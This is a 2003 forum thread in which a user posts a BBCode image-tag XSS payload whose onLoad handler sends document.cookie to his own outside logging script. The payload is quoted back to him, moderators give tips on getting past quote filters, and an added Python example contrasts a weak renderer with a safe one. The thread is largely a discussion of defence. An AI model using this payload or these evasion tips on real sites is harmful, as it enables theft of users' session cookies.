Author | Post | |||
Andiroo |
|
|||
15.10.2003 16:23:57 |
|
|||
Andiroo |
bah didn't work [image=http://www.mylink/THO.jpg" name="hia" onLoad="hia.src='http://m-net.arbornet.org/~andiroo/logreport.php?logreport=damnm' + document.cookie";] |
|||
Edited by Andiroo on 15.10.2003 16:50:12 | ||||
15.10.2003 16:38:15 |
|
|||
phiber |
http://m-net.arbornet.org/~andiroo/logreport.php?logreport=damnm' + document.cookie"; Would you mind telling us why you want our cookie? Anyways you wouldn't go so far if you receive outdated phpsessid's. |
|||
Edited by phiber on 15.10.2003 17:04:17 | ||||
15.10.2003 16:56:27 |
|
|||
theblacksheep |
phiber was one of the guys who tried stuff like that some time ago (it was you, wasn't it?) and he found some not-so-nice stuff. But we fixed it, and it should not be possible to do any harm here. But try it, and if you find something, tell us. |
|||
15.10.2003 20:09:04 |
|
|||
phiber |
1. You can try to do XSS, but at least do not try to steal cookies (in case the XSS works lol) 2. Yes, I was that one (remember "you are an idiot hahahaha"?) |
|||
15.10.2003 20:41:47 |
|
|||
theblacksheep |
One of the biggest problems is that browsers even read stuff that should not be read because it is wrong, and that helps to exploit:
- you can input things without quotes and the browser that shows the page knows what to do
- check the object tag!
- if you only filter ' and " you have a problem because it also works without |
|||
Edited by theblacksheep on 15.10.2003 21:16:44 | ||||
15.10.2003 21:13:33 |
|
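theblacksheep's point above, that filtering only ' and " is not enough because the browser also accepts attributes without quotes, as an added Python example (not code from this forum). The two renderer functions, the way `[image=...]` is turned into an `img` tag, and the sample input are constructed assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

def render_image_weak(url):
    # Assumed weak renderer: deletes ' and " and emits an unquoted attribute.
    cleaned = url.replace("'", "").replace('"', "")
    return "<img src=" + cleaned + ">"

def render_image_safe(url):
    # Validate the URL first, then encode for the attribute context and
    # always emit the attribute inside double quotes.
    try:
        parts = urlsplit(url)
        ok = parts.scheme in ("http", "https") and bool(parts.netloc)
    except ValueError:
        ok = False
    if any(c.isspace() or c in "\"'<>`" for c in url):
        ok = False
    if not ok:
        # Rejected input is shown as inert, escaped text instead of a tag.
        return html.escape("[image=" + url + "]", quote=True)
    return '<img src="' + html.escape(url, quote=True) + '" alt="">'

class AttrCollector(HTMLParser):
    """Collects attribute names of every <img> tag the parser sees."""
    def __init__(self):
        super().__init__()
        self.names = []
    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.names.extend(name for name, _ in attrs)

def img_attributes(markup):
    parser = AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.names

# Constructed sample: a quote closes src and adds further attributes.
SAMPLE = 'http://example.invalid/a.jpg" name="x" onload="alert(1)'

if __name__ == "__main__":
    print(img_attributes(render_image_weak(SAMPLE)))   # extra attributes survive
    print(img_attributes(render_image_safe(SAMPLE)))   # no img tag is produced
```

With the quotes deleted, whitespace alone still separates attributes, so the weak renderer's output parses with `name` and `onload` next to `src`; the validated and encoded version yields no tag at all for that input.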
|||
Andiroo |
Yeah lol. It was semi-working lol. I got it to go to the site. But the JavaScript wasn't working; it wouldn't give me the damn cookie lol. Yup, I was checking for a nice XSS. Didn't work tho. Nice job on getting the forum secure. Humm, you guys are very err... dunno what the word is, but checking the URL of the image lol. Yeah OK, sorry about the attempted cookie stealing. It was a new technique that I learned, and I just wanted to check it out. The thing that annoys me is that I saw this site where I was making popup messages come up on the homepage. I could have done all sorts of things if I knew more. |
|||
Edited by Andiroo on 16.10.2003 21:46:37 | ||||
16.10.2003 21:44:14 |
|